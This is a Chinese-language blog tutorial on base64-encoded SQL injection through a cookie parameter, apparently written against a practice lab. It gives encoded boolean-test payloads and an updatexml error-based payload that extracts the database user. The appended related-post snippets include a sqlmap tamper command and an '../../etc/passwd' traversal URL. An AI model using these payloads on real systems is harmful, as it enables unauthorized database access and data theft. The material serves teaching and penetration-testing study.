SQL 注入漏洞(十三)base64注入

已于 2022-06-21 23:31:19 修改
阅读量1.6k 收藏 7
点赞数 1
分类专栏: OWASP TOP10 文章标签: sql php web安全
于 2022-06-21 23:08:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_51730169/article/details/125399811
版权
本文介绍了Base64编码在SQL注入中的应用,如何通过编码绕过GPC拦截,并展示了利用Base64编码进行SQL注入的测试步骤。文中提到的代码示例展示了如何解码Cookie中的数据并将其拼接到SQL查询中,从而可能导致安全漏洞。通过注入测试和利用报错注入,可以探测并获取敏感信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、base64编码注入

base64 一般用于数据编码进行传输,例如邮件,也用于图片加密存储在网页中。数据编码的好处是,防止数据丢失,也有不少网站使用
base64 进行数据传输,如搜索栏 或者 id 接收参数有可能使用 base64 处理传递的参数。在 php 中 base64_encode()函数对字符串
进行 base64 编码也可以进行解码。
编码解码流程:
1 ->base64 编码->MQ==->base64 解密->1
base64 编码注入,可以绕过 gpc 注入拦截,因为编码过后的字符串不存在特殊字符。编码过后的字符串,在程序中重新被解码,再拼接成
SQL 攻击语句,再执行,从而形式 SQL 注入。

二、代码分析

从存在漏洞的代码中,首先判断是否有 POST 的 submit 参数过来,如果有使用$_COOKIE['uname']获取 cookis 传过来的账号,再
拼接到 SQL 带入查询。
这段代码的意思$cookee = base64_decode($cookee);$cookee 传过来的参数进行解码,所以$cookee 传递过来的数据必须先进
行编码,否则解码不了会导致出错。

在这里插入图片描述

三、base64 编码进行注入

1、测试注入点

首先观察网站是否存在 base64 编码的数据,例如传递的id值,搜索模块。
如果存在类似==等,可以用 base64 解码进行测试。
admin'and 1=1-- 编码 YWRtaW4nYW5kIDE9MS0tIA==
admin'and 1=2-- 编码 YWRtaW4nYW5kIDE9Mi0tIA==

本次测试的页面是 cookie ,所以需要 cookie 提交,而且有括号需要闭合。

原字符串                     base64 编码
admin') and 1=1--      YWRtaW4nKSBhbmQgMT0xLS0gIA==
admin') and 1=2--      YWRtaW4nKSBhbmQgMT0yLS0gIA==

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

第一次提交页面返回存在 admin,第二次提交没有 admin,两个页面返回的结果不相同,所以存在 SQL 注入。

2、查询敏感信息

本代码存在 mysqli_error 函数,所以可以里利用报错注入再进一步获取敏感信息。
admin') and (updatexml(1,concat(0x7e,(select user()),0x7e),1))-- 
进行 base64 编码
YWRtaW4nKWFuZCAodXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB1c2VyKCkpLDB4N2UpLDEpKS0tICA=
提交获取敏感信息。

在这里插入图片描述
在这里插入图片描述

WEB安全渗透测试》(9)SQL注入实战:base64注入
午夜安全
10-24 4303
WEB安全渗透测试》(9)SQL注入实战:base64注入 base64注入是针对传递的参数被base64加密后的注入点进行注入。这种方式常用来绕过一些WAF的检测。1)判断是否存在注入使用Burp的Decoder模块对参数进行base64编码,如下所示:id=1,id=1’,id=1 and 1=1,id=1 and 1=2编码后:id=MQ==,id=MSc=,id=MSBhbmQgMT0x,id=MSBhbmQgMT0y访问的结果如下,说明存在SQL注入漏洞。2)查询字段数量判断出字段数量是:...
25-1 SQL 注入攻击 - cookie base64编码注入
weixin_43263566的博客
03-03 344
原理Base64编码的原理是将三个字节的二进制数据(共24位)转换成四个ASCII字符。由于每个ASCII字符可以表示64种状态(2^6),刚好可以用来表示24位二进制数据。这种编码方式通过将二进制数据划分为每组6位,然后将这6位的值转换为对应的Base64字符,从而实现编码过程。字符集大写英文字母:A-Z小写英文字母:a-z数字:0-9两个额外的符号,在不同的系统中可能有所不同,通常是和此外,为了使编码的结果能够被整除为4,Base64编码可能会在最后使用字符进行填充。编码表索引字符。
SQL注入-11】base64注入案例—以Sqli-labs-less22为例(借助BurpSuite工具)
m0_64378913的博客
05-06 3220
目录1 base64注入概述1.1 base64编码基础1.2 base64编码与URL编码1.3 base64注入2 base64注入案例2.1 实验平台2.2 实验过程2.2.1 注入前准备2.2.2 判断注入点及注入类型2.2.3 尝试使用union查询2.2.4 获取库名表名字段名字段内容 1 base64注入概述 1.1 base64编码基础 定义:Base64是网络上最常见的用于传输8Bit字节码的编码方式之一,Base64就是一种基于64个可打印字符来表示二进制数据的方法。 Base
【网络安全SQL注入--base64注入
边缘拼命划水的小陈
04-07 595
当用户名存入cookie中并且会直接拼接到sql语句中时,可能会存在此漏洞。burpsuite抓取登录信息,为base64编码信息。》两次结果不同故存在sql注入。》经过尝试,字段数目为3。判断编码信息为用户名。
SQL注入8之加解密注入基于base64编码
最新发布
jonhswei的博客
04-18 395
加解密注入是搜狗注入的一种,数据在传输时可能被加密,注入语句需同方式加密才能成功实施注入。通过靶场第21关演示加解密注入,展示数据包中的Cookie被Base64加密的过程。在真实网站中,如腾讯视频等,Base64加密也常被用于视频、图片等数据的处理。要进行注入,需将注入语句先加密为Base64编码方式,否则无法实施注入。加解密注入的原理简单,但需识别数据编码方式,并将注入语句加密为相同格式。Base64是8位字节自解码的编码方式之一,可用于数据加密。注入语句加密的必要性和方法。解密操作的步骤和工具使用。
SQL注入BASE64变形注入
秋水的博客
09-02 3263
注入简介 什么是base64注入base64注入是针对传递的参数被base64加密后的注入点进行注入。除了数据被加密意外,其中注入方式与常规注入一般无二 编码工具选择 在线工具:http://tool.oschina.net/encrypt?type=3 也可以使用burp中自带的编码模块(decoder) 如何发现此漏洞? 在互联网系统中,目前遇到两种base64加密...
Base64变形注入
kuxing100的专栏
03-19 2690
什么是注入?估计有点基础的人都会反问,你傻逼吧,问这么傻逼的问题,把自己的SQL语句插入到原程序中,操作数据库。 你的注入熟吗?常在论坛逛的人都会反问,你傻逼吧,问这么傻逼的问题,论坛这么多关于注入的文章,怎么可能不会,工具注手注无所不会。 那么你知道Base64变异注入吗?这下轮到你傻逼了吧?不知道,而且工具也没这么个功能,或者说,闻所未闻。如果你感觉对SQL手工注入已经很熟了,看看这篇文章
用友U8 Cloud base64 SQL注入漏洞复现
0xSec
03-13 1290
用友U8 Cloudbase64接口处存在SQL注入漏洞,未授权的攻击者可通过此漏洞获取数据库权限,从而盗取用户数据,造成用户信息泄露。
用友U8 Cloud base64 SQL注入
weixin_43567873的博客
03-15 477
用友U8 Cloud base64 SQL注入
CTF 加密 解密 SQL注入 BASE64
03-19
综合上述,CTF比赛涵盖了广泛的网络安全知识,包括加密与解密策略、理解并利用BASE64编码、识别和利用SQL注入漏洞,以及使用扫描测试工具进行漏洞探测。参与CTF不仅可以提升个人技能,也是对网络安全理论与实践相...
SQL注入11】base64注入基础及实践(基于BurpSuite工具的Sqli-labs-less22靶机平台)
Fighting_hawk的博客
02-21 3703
1. base64注入是参数被base64编码过的注入方式;其注入注入手法与之前所学相同。 2. 掌握base64注入的方法。
Sql Server Base64加密解密角本
12-25
非常实用的Base64加密,解密角本。基于UTF8,支持中文加解密。
PHP代码审计】 那些年我们一起挖掘SQL注入 - 3.全局防护Bypass之Base64Decode
05-28 353
PHP代码审计】 那些年我们一起挖掘SQL注入 - 3.全局防护Bypass之Base64Decode 0x01 背景 现在的WEB程序基本都有对SQL注入的全局过滤,像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤,尤其是单引号。同上一篇,我们需要找一些编码解码的函数来绕过全局防护,...
Web安全原理剖析(十)——Base64注入攻击
热门推荐
Phantom03167的博客
10-01 1万+
Base64注入攻击
Sqlmap注入Base64编码的注入
weixin_30412013的博客
06-20 878
不小心删了,找快照才找到的。补回来。。。 上次遇到一个Base64注入点,手工注入太麻烦,于是在网上看了一下sqlmap Base64注入的方法,如下: sqlmap -u http://xxxx.com/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs sqlmap拥有很多功能强力的插件,插件的使用方法: -...
【Mysql sql inject】POST方法BASE64编码注入write-up
weixin_30699235的博客
04-20 199
翻到群里的小伙伴发出一道POST型SQL注入题,简单抓包判断出题目需要base64编码后才执行sql语句,为学习下SQL注入出题与闯关的思路+工作不是很忙,所以花点时间玩了一下,哈哈哈哈哈哈哈哈哈 http://104.224.169.128/tasks/web12.php 1 <scriptlanguage="javascript">function on...
sql注入----base64注入
2402_83134109的博客
12-20 349
通过bp抓包send to Repeter,发现cookie中的uname已经被加密。注意本关点击时无反应,需把url后边的地址改对就可以或者在第二页也有22关。通过bp中的base64解码,获得账户名dumb(此处记得将%3D换成=)其余步骤同报错注入语句。(报错注入请看上一篇文章)然后再通过base64加密将dumb'加密。那么换成"继续尝试。发现此时报错,所以使用。Render发现没有变化。使用base64解码之后进行带入查询。账户密码为Dumb,Dumb,登录。
web渗透——base64注入
weixin_44321116的博客
12-07 390
sqli-labs第22关为例
MySQL Cookie Base64注入
m_de_g的博客
12-08 2567
Cookie Base64注入 1.Base64介绍 Base64编码是从二进制到字符的过程,可用于在HTTP环境下传递较长的标识信息。Base64是网络上最常见的用于8Bit字节码的编码方式之一,Base64就是一种基于64个可打印字符来表示二进制数据的方法。 将原始内容转换为二进制,从左到右一次取6位,然后在最高位补两位0,形成新的内容。 编码规则: (1)把3个字符变成4个字符。 (2)每76个字符加一个换行符。 (3)最后的结束符也要处理。 2.Cookie Base64注入代码分析 base64_
sql注入漏洞报告
03-24
### SQL注入漏洞详情分析 SQL注入是一种常见的网络安全威胁,攻击者可以通过未经过滤或验证的用户输入,在应用程序中执行恶意SQL查询。以下是关于SQL注入漏洞的详细分析以及如何编写一份完整的漏洞报告。 #### 一、SQL注入漏洞原理 SQL注入的核心在于攻击者能够通过控制输入变量的方式影响数据库查询逻辑。如果程序直接将未经验证的用户输入嵌入到SQL语句中,则可能导致意外行为的发生[^1]。例如: ```sql SELECT * FROM users WHERE username = '$username' AND password = '$password'; ``` 当`$username`被设置为`admin' --`时,上述查询会被篡改为: ```sql SELECT * FROM users WHERE username = 'admin' -- AND password = ''; ``` 这使得密码条件失效,从而允许非法登录。 --- #### 二、常见SQL注入类型 根据攻击方式的不同,SQL注入可分为以下几种主要类型: 1. **经典型SQL注入** 攻击者通过修改SQL语法结构实现目标功能,比如绕过身份认证或读取敏感数据。 2. **盲注型SQL注入** 当应用返回的结果不显示具体错误信息时,攻击者可通过布尔判断或时间延迟等方式推测数据库内容。 3. **联合查询型SQL注入 (Union-based)** 利用 `UNION SELECT` 将额外的数据附加至原始查询结果集中,用于窃取更多表的信息。 4. **基于带外通道的SQL注入 (Out-of-band OOB)** 如果网络环境支持外部连接,攻击者可能借助DNS请求等形式回传数据给远程服务器。 --- #### 三、SQL注入漏洞的影响范围 成功实施SQL注入可能会带来严重的后果,包括但不限于以下几个方面: - 数据泄露:未经授权访问机密记录; - 数据破坏:删除重要表格或者更改现有条目; - 权限提升:新增管理员账户并完全掌控后台管理系统; - 远程代码执行(RCE): 在少数场景下甚至能触发操作系统层面的操作; --- #### 四、预防措施与最佳实践 为了有效防范此类风险,开发人员应当遵循如下指导方针: 1. 使用参数化查询代替字符串拼接构建动态SQL语句[^2]; 2. 对所有来自客户端的数据进行全面校验, 包括长度限制、字符集约束等; 3. 配置最低限度的安全策略授予DBMS账号所需权限而已; 4. 自定义异常提示消息隐藏内部架构细节以防助纣为虐; --- #### 五、SQL注入漏洞报告模板 撰写一份专业的漏洞报告需包含以下要素: | 字段名 | 描述 | |----------------|----------------------------------------------------------------------| | 漏洞名称 | 明确指出问题所在 | | CVE编号 | 若已公开则填写对应ID | | CVSS评分 | 表达危害程度 | | 影响版本 | 受损软件及其关联组件 | | 复现步骤 | 提供清晰易懂的过程描述 | | 实际效果演示 | 展示实际产生的不良后果 | | 解决方案建议 | 给出可行修补办法 | 示例文档片段如下所示: > ### 脚本文件路径解析缺陷导致目录遍历漏洞(CVE-XXXX-YYYY) > > #### 危险等级: HIGH(高危), CVSS v3 Base Score: X.X/10 > > #### 发生位置: > /api/v1/download.php?file=../../etc/passwd%00.jpg > > #### 测试方法: > 向服务端发送GET请求携带畸形参数即可触发该BUG. > > #### 结果截图: > ![](http://example.com/image.png) ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值